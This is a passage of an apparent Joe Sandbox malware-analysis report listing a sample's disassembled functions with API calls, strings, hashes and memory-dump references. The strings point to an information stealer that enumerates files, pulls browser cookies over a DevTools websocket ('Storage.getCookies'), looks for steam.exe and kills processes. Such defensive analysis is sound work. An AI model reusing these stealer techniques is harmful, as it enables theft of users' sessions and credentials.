                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,00CFE028), ref: 004EDA5E
                                  • Part of subcall function 004ED980: lstrcpy.KERNEL32(00000000,?), ref: 004EDA8E
                                  • Part of subcall function 004ED980: GetFileAttributesA.KERNEL32(00000000), ref: 004EDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004EDE2E
                                • FindClose.KERNEL32(00000000), ref: 004EDE3D
                                • lstrcat.KERNEL32(?,00CFFA58), ref: 004EDE66
                                • lstrcat.KERNEL32(?,00CFE740), ref: 004EDE7A
                                • lstrlen.KERNEL32(?), ref: 004EDE84
                                • lstrlen.KERNEL32(?), ref: 004EDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EDED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 99a526190f00295132f1c5275e0d16d514fb0972f22499cc895b3bb39d7b3460
                                • Instruction ID: 1975c40ef97b8aaedd92b6cd280c09c34682e84536a227251f3e64f3685111df
                                • Opcode Fuzzy Hash: 99a526190f00295132f1c5275e0d16d514fb0972f22499cc895b3bb39d7b3460
                                • Instruction Fuzzy Hash: 88618071A00209EBCB10EB75DD49AEE7779FF58300F0086AAF64597351DF38AA44CB54
                                Function 004ED530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 004ED54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 004ED564
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004ED584
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004ED59E
                                • lstrcat.KERNEL32(?,00CFFA58), ref: 004ED5E3
                                • lstrcat.KERNEL32(?,00CFF8C8), ref: 004ED5F7
                                • lstrcat.KERNEL32(?,?), ref: 004ED60B
                                • lstrcat.KERNEL32(?,?), ref: 004ED61C
                                • lstrcat.KERNEL32(?,00501794), ref: 004ED62E
                                • lstrcat.KERNEL32(?,?), ref: 004ED642
                                • lstrcpy.KERNEL32(00000000,?), ref: 004ED682
                                • lstrcpy.KERNEL32(00000000,?), ref: 004ED6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004ED737
                                • FindClose.KERNEL32(00000000), ref: 004ED746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 3a3f4c6b08786a0a37abad3b36e41f9f0261b4d21b4c9ea0c387783542d673ae
                                • Instruction ID: 5b48c78057b83d39d3dcfd5a72092c044b0c529a91ac6376263b2fbb063a727d
                                • Opcode Fuzzy Hash: 3a3f4c6b08786a0a37abad3b36e41f9f0261b4d21b4c9ea0c387783542d673ae
                                • Instruction Fuzzy Hash: F1617371A101199BCF20EF75DD88ADE77B8EF48305F0085AAE64993351DF38AA44CF94
                                Function 004F48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: 754e2087b1bb663583c3c07747c4319a175962619617ebfba0c8229ebdf95a8f
                                • Instruction ID: bbc6e7a58c077fb79adcde1f44751ce742008cc385f0c62ba2f4c74f7e48652d
                                • Opcode Fuzzy Hash: 754e2087b1bb663583c3c07747c4319a175962619617ebfba0c8229ebdf95a8f
                                • Instruction Fuzzy Hash: 94A26870D0125D9FDB10DFA8C9907EEBBB6AF88304F1481AAD608A7341DB785E85CF95
                                Function 004E23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E2402
                                • lstrlen.KERNEL32(\*.*), ref: 004E240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004E2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 97027f73e8b11c78671ba9ac7d3827874ec080fdd4af1c4c6e256e0046f02e58
                                • Instruction ID: b58420fee9bd1446d7c7ab2bcfdc62bb3c94405a0941eedf26c8e5f0c6c024f1
                                • Opcode Fuzzy Hash: 97027f73e8b11c78671ba9ac7d3827874ec080fdd4af1c4c6e256e0046f02e58
                                • Instruction Fuzzy Hash: 9E4153307101598BCB22EF26DE95B9F77A8EF20305F00616BF94597362CBBC9C018B99
                                Function 00897ABB Relevance: 14.2, Strings: 10, Instructions: 1659COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6~{$B[.u$Kw?$g|_;$iy6$$o1~f$tu<$uP\$H6?$gk[
                                • API String ID: 0-4170337394
                                • Opcode ID: cbd3a3bfd977f63efed6321cfaf5316f7a594c4e37e35991f17b0661a167dca7
                                • Instruction ID: 725e3109ca95a502ffcd75ab172385197b6c2dd5eb27b1b9fb687826fbcd1163
                                • Opcode Fuzzy Hash: cbd3a3bfd977f63efed6321cfaf5316f7a594c4e37e35991f17b0661a167dca7
                                • Instruction Fuzzy Hash: BFB207F360C2049FE304AE2DEC8567AFBE9EF94720F164A3DE6C5C3344E63598458696
                                Function 004F46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 004F46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F4711
                                • CloseHandle.KERNEL32(00000000), ref: 004F4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F4726
                                • CloseHandle.KERNEL32(00000000), ref: 004F4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 3c9f3e1eed80ca6e7482ad3893beae39e09b6ac5f3a2f3a805069a40b37b8be9
                                • Instruction ID: 449636073a3cd16c4db89f86652ab27c287087595b72de7819ff3f66da7a1182
                                • Opcode Fuzzy Hash: 3c9f3e1eed80ca6e7482ad3893beae39e09b6ac5f3a2f3a805069a40b37b8be9
                                • Instruction Fuzzy Hash: F901C43150111AEBE7206B60DC8CFFB37BCEB85B41F048299FA45D1181EF7CA9408B69
                                Function 004F4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 004F4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 004F4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F4672
                                • CloseHandle.KERNEL32(00000000), ref: 004F467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 0c3c9bdebe260eda820f10e5a4db7c3a3efab94f4086dd2c7fded443023b8de9
                                • Instruction ID: bb5348e0be9cc7c587d4becc60288e0cccd29ab9bdf76f746240b67de97cd243
                                • Opcode Fuzzy Hash: 0c3c9bdebe260eda820f10e5a4db7c3a3efab94f4086dd2c7fded443023b8de9
                                • Instruction Fuzzy Hash: CE018F716021299BE7209B70AC48FEB77ACEF49350F0482D6FA48D1140EF7C99948AE9
                                Function 004E4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4B7F
                                • lstrlen.KERNEL32(00504CA8), ref: 004E4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BA7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: cca369ec3d67ac9cb102cbc86a59cebc733fb8f7563a8b57ee91cbb2e988d82e
                                • Instruction ID: df4df4e87f3f1c432e2fd4ef4b21c9eadce013c0124184751744057d61d276a2
                                • Opcode Fuzzy Hash: cca369ec3d67ac9cb102cbc86a59cebc733fb8f7563a8b57ee91cbb2e988d82e
                                • Instruction Fuzzy Hash: 923172316211599BCB21EF26EE95B9F77A5EFA0305F00512BF90597361CB78EC018B98
                                Function 00894477 Relevance: 11.6, Strings: 8, Instructions: 1566COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &o$"%Ad$UGw$[3q}$ble$gB-$h*}{$i+y
                                • API String ID: 0-1807720337
                                • Opcode ID: 66bed94587c3311240443ac8c26165dbf1274a3db325730f8e31a50bca5506fb
                                • Instruction ID: c9249e46436b7e41e8f56d0374de8d223f81197c31552d3d94b62872644946f5
                                • Opcode Fuzzy Hash: 66bed94587c3311240443ac8c26165dbf1274a3db325730f8e31a50bca5506fb
                                • Instruction Fuzzy Hash: FFB2F5F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744E63598458796
                                Function 004F2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004F2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004F2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004F2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004F2DEC
                                • LocalFree.KERNEL32(00000000), ref: 004F2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
